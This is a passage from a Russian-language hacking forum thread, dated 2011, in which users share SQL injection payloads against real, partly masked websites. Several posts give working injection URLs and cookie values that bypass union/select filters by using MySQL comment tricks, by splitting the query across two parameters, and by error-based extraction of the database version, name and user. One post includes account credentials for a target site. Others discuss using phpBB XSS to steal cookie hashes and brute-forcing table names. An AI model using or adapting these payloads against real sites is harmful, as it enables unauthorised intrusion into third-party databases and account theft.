Старый 16.02.2011, 01:04   #851
skM
 
Регистрация: 06.07.2010
Сообщений: 95
Репутация: 8
По умолчанию

Сначала это обходилось /*!union*//**//*!select*/, а потом и так не получалось.
skM вне форума   Ответить с цитированием
Старый 16.02.2011, 10:44   #852
vp$
 
Аватар для vp$
 
Регистрация: 13.07.2010
Сообщений: 70
Репутация: 8
По умолчанию

Цитата:
Сообщение от Oza Посмотреть сообщение
Код:
http://***.ru/comments.php?t_key=193917+and+substring%28%28select+version%28%29%29,1,%20%201%29=4&base=fotos&album=1
http://***.ru/comments.php?t_key=193917+and+substring%28%28select+version%28%29%29,1,%20%201%29=5&base=fotos&album=1
аккаунт:
login:c4689589
password:c4689589

Если в запросе union И select вместе, не проходит.
HELP.
зачем так все усложнять, есть и не блинд скули
url: http://www.***.ru/showtopic.php?
cookie: num=-475+/*!union*//*qwe*/+/*!select*/+1,2,version(),4,5,6,7,8,9,10--

5.1.50

она же error based

Последний раз редактировалось Twost; 16.05.2013 в 09:58..
vp$ вне форума   Ответить с цитированием
Старый 16.02.2011, 10:58   #853
BlackFan
 
Аватар для BlackFan
 
Регистрация: 08.07.2010
Сообщений: 354
Репутация: 402
По умолчанию

А у меня вариант интересней
Код:
http://***.ru/comments.php?t_key=193917+and+0+union/*&base=*/select+1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7+--+&album=1
Оба параметра учавствуют в запросе и вместо
Код:
select blah,blah,blah where t_key=193917 and base='fotos'
делаем
Код:
select blah,blah,blah where t_key=193917 and 0 union/* and base='*/select 1,2,3,4,5,6,7 -- '
За счет этого в одном параметре нет комбинации union select, и мы обходит защиту

Последний раз редактировалось Twost; 16.05.2013 в 09:58..
BlackFan вне форума   Ответить с цитированием
Старый 16.02.2011, 18:05   #854
Cross
 
Регистрация: 27.08.2010
Сообщений: 114
Репутация: 2
По умолчанию

Добрый день.

Есть раскрытые пути в пхпбб 2.0.16
Цитата:
/includes/sessions.php
/groupcp.php
/login.php
/memberlist.php
/posting.php
/privmsg.php
/profile.php
/viewforum.php
/viewtopic.php
Ну вобщем то они стандартные...

Вопрос: у этого всего продолжение есть? Или это финиш?!

Из темы "Обзор уязвимостей пхпББ" на античате, проканывает только XSS, да и то не все...

п.с. у меня в убунту нет возможности откатиться на 4 или 3 ветку мускула и самому поковырять эту версию двига...
Cross вне форума   Ответить с цитированием
Старый 16.02.2011, 18:17   #855
ont
 
Аватар для ont
 
Регистрация: 16.12.2010
Сообщений: 57
Репутация: 92
По умолчанию

Цитата:
Сообщение от Cross Посмотреть сообщение
Добрый день.
Есть раскрытые пути в пхпбб 2.0.16
<...>
Возможно это будет полезным:
http://www.cvedetails.com/vulnerabil...bb-2.0.16.html
ont вне форума   Ответить с цитированием
Старый 16.02.2011, 21:05   #856
Cross
 
Регистрация: 27.08.2010
Сообщений: 114
Репутация: 2
По умолчанию

Не нужно создавать посты заново, я их не для этого тру.
Такого рода дискуссий тут не будет =\
https://rdot.org/forum/showthread.php?t=1174
//Jokester

Последний раз редактировалось Jokester; 16.02.2011 в 21:10..
Cross вне форума   Ответить с цитированием
Старый 16.02.2011, 21:36   #857
Consistent
 
Регистрация: 06.12.2010
Сообщений: 25
Репутация: 0
По умолчанию

У кого есть хорошие словари для брута таблиц под четвертую ветку mysql?
Необходимо прогнать мой сайтик. Своими пробовал, результата на добился. Возможно есть какие то оригинальные префиксы, двиг мне не знаком.
В общем если у кого есть желание вместе поковырять, пишите в пм контакт. Сайт интересный
Ув. модеры, переместите плз если не там написал. Не нашел более подходящей темы.
Consistent вне форума   Ответить с цитированием
Старый 17.02.2011, 06:26   #858
Nightmare
Banned
 
Регистрация: 06.07.2010
Сообщений: 162
Репутация: 10
По умолчанию

Цитата:
Сообщение от Cross Посмотреть сообщение
Из темы "Обзор уязвимостей пхпББ" на античате, проканывает только XSS, да и то не все...
Если phpBB старый, и в кукисах хранится md5 хеш, как это обычно часто бывает, этой XSS более чем достаточно для взлома.
Nightmare вне форума   Ответить с цитированием
Старый 18.02.2011, 17:53   #859
skM
 
Регистрация: 06.07.2010
Сообщений: 95
Репутация: 8
По умолчанию

Цитата:
Сообщение от Oza Посмотреть сообщение
Код:
http://***.ru/comments.php?t_key=193917+and+substring%28%28select+version%28%29%29,1,%20%201%29=4&base=fotos&album=1
http://***.ru/comments.php?t_key=193917+and+substring%28%28select+version%28%29%29,1,%20%201%29=5&base=fotos&album=1
аккаунт:
login:c4689589
password:c4689589

Если в запросе union И select вместе, не проходит.
HELP.
Примерно та же проблема возникла, фильтрует сочетание union select
http://***.de/bullspress/search.php?search_category_id=79

Последний раз редактировалось Twost; 16.05.2013 в 09:59..
skM вне форума   Ответить с цитированием
Старый 18.02.2011, 18:19   #860
S00pY
 
Аватар для S00pY
 
Регистрация: 06.07.2010
Сообщений: 39
Репутация: 35
По умолчанию

Цитата:
Сообщение от skM Посмотреть сообщение
Примерно та же проблема возникла, фильтрует сочетание union select
http://***.de/bullspress/search.php?search_category_id=79

***.de/bullspress/search.php?search_category_id=79'+or+(SeLect+count (*)+from+(select+1+UnIoN+select+2+UnIoN+select+3)x +group+by+concat(version(),floor(rand(0)*2)))%23

Последний раз редактировалось Twost; 16.05.2013 в 09:59..
S00pY вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot